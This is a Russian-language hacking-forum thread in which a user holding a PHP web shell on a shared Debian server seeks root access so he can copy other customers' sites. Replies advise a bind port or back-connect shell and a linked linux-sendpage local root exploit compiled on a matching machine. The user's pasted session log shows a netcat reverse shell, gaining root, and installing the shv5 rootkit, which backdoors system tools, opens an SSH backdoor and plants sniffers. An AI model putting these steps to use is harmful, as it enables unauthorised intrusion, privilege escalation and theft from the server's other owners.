На сервере есть шелл Safe_Mode = OFF Могу ходить по папкам только текущего домена, видны папки соседних доменов, но зайти не могу, рубит права. Вот конфигурации из шела Ядрышко: Linux 2.6.26-2-amd64 #1 SMP Fri Mar 27 04:02:59 UTC 2009 x86_64 Пыха: PHP/5.2.9-4 Апачка: 2.2.12 (Debian) Заранее благодарю за помощь!
Ставишь биндпорт \ устанавливаешь бекконект, Проверяешь, можно ли заюзать gcc (gcc --help), если нельзя - компилишь на похожем сервере с учетом путей (если используются), заливаешь на сервер, запускаешь. http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz // вообще надо задавать более конкретные вопросы.
Вот ещё один вопрос. Как юзать такого рода шелы? Я создавал тему с таким вопросом, но её по какой-то неизвестной мне причине удалили. Заранее спасибо за ответ.
Вот с этого и начнем. В чем проблема? Не запускается? Не знаешь команды? Не знаешь вообще зачем это? Тогда для начала RTFM, потом с более конкретными проблемами обратно на форум.
В том то и дело что нигде конкретно не нашел что именно делать, куда заливать. как запускать. Команды поискать не сложно. И не понял как биндить порт. В шелле когда делаешь через perl пишет, что не найден какой-то скрипт.
/threadnav17581-1-10.html /showthread.php?t=30711 если постараться можно еще и видео найти но эт помойму уже лишнее, а вообше над просто искать нормально
Просто на сервере лежат очень хорошие проекты сайтов. Хочу сделать их рип, но права не позволяют. P.S. Шелл madshell99 такая проблема. Ввожу я команды, но ответ от сервера не получаю. Просто выходит окно, где внизу сама команда а вверху пусто. Ни при unname -a ничего не получаю в ответ ни при любой другой. P.P.S: порт забиндил, продвигаюсь дальше, но всё равно на будущее вопрос. Почему сервер не отвечает шеллу?
И снова ногами в жир =/ Сначала не нашел команду curl заменил её командой wget закачал всё это дело, затем начал компилить сплойт, он грит что не найдена команда gcc. Выше BlackSun писал, что можно скомпилировать это дело на другом сервере с учётом путей целевого сервера. А как это можно сделать? Сменить пути например на нужные.
Найти сервак с такой же архитектурой и установленным gcc, скомпилить там, затем залить бинарник на целевой хост и запустить
Вобщем при получении руткита вот что выползает Code: C:\nc1>nc dhfcfghity.net 32767 bash: no job control in this shell dbvncbnity@www:/home/dnfhshrfdgcity/data/www/dnepfdgрrcity.net/forum/customprofilepics$ cd linux-sendpage3 dnedgdsdfgcity@www:/home/dneprasdcsfadity/data/www/dasdfneprcitdfsfsay.net/forum/customprofilepics/linux-sendpage3$ ./start sh: no job control in this shell sh-3.2# tar -xvf /home/dnefdghdfprcity/data/www/dnfedsfpgdfrcity.net/forum/customprofilepics/ shV5.tgz shv5/ shv5/setup shv5/README shv5/lib.tgz shv5/conf.tgz shv5/bin.tgz shv5/utilz.tgz sh-3.2# cd shv/ sh: cd: shv/: No such file or directory sh-3.2# cd shv5/ sh-3.2# ./setup 1074963 4321 ←[0;36m[←[1;37msh←[0;36m]# Installing shv5 ... this wont take long ←[0m ←[0;36m[←[1;37msh←[0;36m]# If u think we will patch your holes shoot yourself !← [0m ←[0;36m[←[1;37msh←[0;36m]# so patch manualy and fuck off! ←[0m ←[1;37m========================================================================= ===←[0m ←[0;36m MMMMM MMMMMM MMM MMMMMMMMM MMMM MMMM MMM [*] Presenting u shv5-rootkit ! MMM MMMM MMMM MMMM MMMM MMM [*] Designed for internal use ! MMM MMMMMMM MMMMMMMMMMMM MMM MMM MMMMMMMM MMMMMMMMMMMM MMM [*] brought to you by: PinT[x] MMM MMMM MMMM MMMM MMM [*] April й 2003 й MMM MMMM MMMM MMMM MMMM MMM MMM MMMMMMMMM MMMM MMMM MMM [*] *** VERY PRIVATE *** MMM MMM [*] *** so dont distribute *** MMMMM -C- -R- -E- -W- MMMMMM ←[0m ←[1;37m========================================================================= ===←[0m ←[0;36m[←[1;37msh←[0;36m]# backdooring started on ←[1;37mwww.uzyuuya.ua←[0m ←[0;36m[←[1;37msh←[0;36m]# ←[0m ←[0;36m[←[1;37msh←[0;36m]# ←[0m ←[0;36m[←[1;37msh←[0;36m]# checking for remote logging... ←[0mgrep: /etc/syslog. conf: No such file or directory ←[1;37m guess not.←[0m ←[0;36m[←[1;37msh←[0;36m]# checking for tripwire... ←[0m←[1;37m guess not. ←[0m ←[0;36m[←[1;37msh←[0;36m]# [Installing trojans....] ←[1;34m ←[0m mv: cannot stat `lib/libproc.so.2.0.6': No such file or directory ←[0;36m[←[1;37msh←[0;36m]# Using Password : ←[1;37m12193 ←[1;34m ←[0m ←[0;36m[←[1;37msh←[0;36m]# Using ssh-port : ←[1;37m4321 ←[0m mkdir: cannot create directory `/usr/lib/libsh': File exists mkdir: cannot create directory `/usr/lib/libsh/.backup': File exists mv: cannot stat `top': No such file or directory ←[0;36m[←[1;37msh←[0;36m]# : ps/ls/top/netstat/ifconfig/find/ and rest backdoored←[0m ←[0;36m[←[1;37msh←[0;36m]# ←[0m ←[0;36m[←[1;37msh←[0;36m]# [Installing some utils...] ←[0m ←[0;36m[←[1;37msh←[0;36m]# : mirk/synscan/others... moved ←[0m ←[0;36m[←[1;37msh←[0;36m]# [Moving our files...] ←[0m mkdir: cannot create directory `/usr/lib/libsh/.sniff': File exists mv: cannot stat `/home/fgdfhnfeghprcity/data/www/dngepfgrdcfity.net/forum/customprofilepics/ linux-sendpage3/shv5/bin/shsniff': No such file or directory mv: cannot stat `/home/dneghpjhrcjhity/data/www/dnhrfcfiftfy.net/forum/customprofilepics/ linux-sendpage3/shv5/bin/shp': No such file or directory mv: cannot stat `/home/dnfgrjckihtgy/data/www/dnehjphrjcjigtfy.net/forum/customprofilepics/ linux-sendpage3/shv5/bin/shsb': No such file or directory chmod: cannot access `/usr/lib/libsh/.sniff/*': No such file or directory chmod: cannot access `/usr/lib/libsh/shsb': No such file or directory ←[0;36m[←[1;37msh←[0;36m]# : sniff/parse/sauber/hide moved ←[0m ←[0;36m[←[1;37msh←[0;36m]# [Modifying system settings to suite our needs] ←[0m ←[0;36m[←[1;37msh←[0;36m]# Checking for vuln-daemons ... ←[0m ps: error while loading shared libraries: libproc.so.2.0.6: cannot open shared o bject file: No such file or directory mkdir: cannot create directory `/usr/lib/libsh/.owned': File exists touch: failed to get attributes of `/etc/inted.conf': No such file or directory ←[1;37m--------------------------------------------------------------------←[0m ←[0;36m[←[1;37msh←[0;36m]# [System Information...]←[0m ←[0;36m[←[1;37msh←[0;36m]# Hostname :←[1;37m www.bghvba.ua (91.200.42.14)←[0m ←[0;36m[←[1;37msh←[0;36m]# Arch : ←[1;37m2009 -+- bogomips : 5576.18 5571.93 '←[0m ←[0;36m[←[1;37msh←[0;36m]# Alternative IP :←[1;37m 91.200.42.14 -+- Might be [3 ] active adapters.←[0m ←[0;36m[←[1;37msh←[0;36m]# Distribution:←[1;37m squeeze/sid←[0m ←[1;37m--------------------------------------------------------------------←[0m ←[0;36m[←[1;37msh←[0;36m]# ipchains ... ? ←[0m ←[0;36m[←[1;37msh←[0;36m]# lucky for u no ipchains found←[0m ←[1;37m--------------------------------------------------------------------←[0m ←[0;36m[←[1;37msh←[0;36m]# iptables ...?←[0m iptables: No chain/target/match by that name. ←[1;37m←[0m ←[1;37m--------------------------------------------------------------------←[0m ←[0;36m[←[1;37msh←[0;36m]# Just ignore all errors if any ! ←[0;36m[←[1;37msh←[0;36m]# ============================== ←[1;31mBackdooring com pleted in :3 seconds ←[0m ./setup: line 813: /sbin/syslogd: No such file or directory sh-3.2# p.s. Адреса в целях безопасности поменял в тексте. Вобщем вопрос, почему ошибка?
Да, запускал эксплойт который советовал BlackSun предварительно скомпилировав его, затем командой id мне показало что я root и мой id везде 0
Сколько смотрел абсолютно все выбивают ошибки. Вероятно там специально они сделаны, но в их исправлении я не силен, можно так сказать вообще 0.